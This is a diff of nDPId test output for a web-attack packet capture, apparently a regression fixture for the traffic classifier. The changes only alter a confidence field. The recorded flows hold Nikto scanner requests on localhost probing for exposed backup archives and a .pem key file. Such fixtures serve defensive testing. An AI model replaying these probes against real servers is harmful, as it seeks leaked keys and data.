-01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":290,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":290,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277128,"flow_last_seen":1576420277128,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277128,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50124,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":290,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":290,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277128,"flow_last_seen":1576420277128,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277128,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50124,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":291,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":291,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277130,"flow_last_seen":1576420277130,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277130,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50126,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00662{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":291,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":291,"flow_packet_id":1,"flow_last_seen":1576420277130,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420277130,"pkt":"AAAAAAAAAAAAAAAACABFAAC9JsdAAEAGFXJ\/AAABfwAAAcPOH5Ap0h5I7vzLNIAYAED+sQAAAQEICp1m\/LKdZvyyR0VUIC8xLnppcCBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} -01046{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":291,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":291,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277130,"flow_last_seen":1576420277130,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277130,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50126,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01046{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":291,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":291,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277130,"flow_last_seen":1576420277130,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277130,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50126,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":292,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":292,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277134,"flow_last_seen":1576420277134,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277134,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50128,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00663{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":292,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":292,"flow_packet_id":1,"flow_last_seen":1576420277134,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420277134,"pkt":"AAAAAAAAAAAAAAAACABFAAC9UWBAAEAG6th\/AAABfwAAAcPQH5CgyWnegf\/5dIAYAED+sQAAAQEICp1m\/LWdZvy1R0VUIC8xLnppcCBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} -01046{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":292,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":292,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277134,"flow_last_seen":1576420277134,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277134,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50128,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01046{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":292,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":292,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277134,"flow_last_seen":1576420277134,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277134,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50128,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":293,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":293,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277136,"flow_last_seen":1576420277136,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277136,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50130,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":293,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":293,"flow_packet_id":1,"flow_last_seen":1576420277136,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420277136,"pkt":"AAAAAAAAAAAAAAAACABFAADFelpAAEAGwdZ\/AAABfwAAAcPSH5CODELdlJWwD4AYAED+uQAAAQEICp1m\/LedZvy3R0VUIC8xMjcuMC4wLjEucGVtIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="} -01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":293,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":293,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277136,"flow_last_seen":1576420277136,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277136,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50130,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":293,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":293,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277136,"flow_last_seen":1576420277136,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277136,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50130,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":294,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":294,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277141,"flow_last_seen":1576420277141,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277141,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50132,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":294,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":294,"flow_packet_id":1,"flow_last_seen":1576420277141,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420277141,"pkt":"AAAAAAAAAAAAAAAACABFAADF+nFAAEAGQb9\/AAABfwAAAcPUH5Dn1sLrZe4ChoAYAED+uQAAAQEICp1m\/L2dZvy9R0VUIC8xMjcuMC4wLjEucGVtIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="} -01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":294,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":294,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277141,"flow_last_seen":1576420277141,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277141,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50132,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":294,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":294,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277141,"flow_last_seen":1576420277141,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277141,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50132,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":295,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":295,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277142,"flow_last_seen":1576420277142,"flow_idle_time":7580000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420277142,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50134,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":295,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":295,"flow_packet_id":1,"flow_last_seen":1576420277142,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":213,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":213,"pkt_l4_len":179,"thread_ts_msec":1576420277142,"pkt":"AAAAAAAAAAAAAAAACABFAADHb5RAAEAGzJp\/AAABfwAAAcPWH5B0BVcY3NxdJYAYAED+uwAAAQEICp1m\/L6dZvy+R0VUIC9iYWNrdXAudGFyLmx6bWEgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCg0K"} -01056{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":295,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":295,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277142,"flow_last_seen":1576420277142,"flow_idle_time":7580000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420277142,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50134,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01056{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":295,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":295,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277142,"flow_last_seen":1576420277142,"flow_idle_time":7580000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420277142,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50134,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":296,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":296,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277144,"flow_last_seen":1576420277144,"flow_idle_time":7580000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420277144,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50136,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":296,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":296,"flow_packet_id":1,"flow_last_seen":1576420277144,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":213,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":213,"pkt_l4_len":179,"thread_ts_msec":1576420277144,"pkt":"AAAAAAAAAAAAAAAACABFAADHO5VAAEAGAJp\/AAABfwAAAcPYH5AuGgMWrL1WfYAYAED+uwAAAQEICp1m\/MCdZvzAR0VUIC9iYWNrdXAudGFyLmx6bWEgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} -01056{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":296,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":296,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277144,"flow_last_seen":1576420277144,"flow_idle_time":7580000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420277144,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50136,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01056{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":296,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":296,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277144,"flow_last_seen":1576420277144,"flow_idle_time":7580000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420277144,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50136,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":297,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":297,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277145,"flow_last_seen":1576420277145,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277145,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50138,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":297,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":297,"flow_packet_id":1,"flow_last_seen":1576420277145,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"thread_ts_msec":1576420277145,"pkt":"AAAAAAAAAAAAAAAACABFAADD1QZAAEAGZyx\/AAABfwAAAcPaH5AWHu2DG+Oig4AYAED+twAAAQEICp1m\/MGdZvzBR0VUIC8xMjcuMC4wLnRhciBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01052{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":297,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":297,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277145,"flow_last_seen":1576420277145,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277145,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50138,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01052{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":297,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":297,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277145,"flow_last_seen":1576420277145,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277145,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50138,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":298,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":298,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277148,"flow_last_seen":1576420277148,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277148,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50140,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
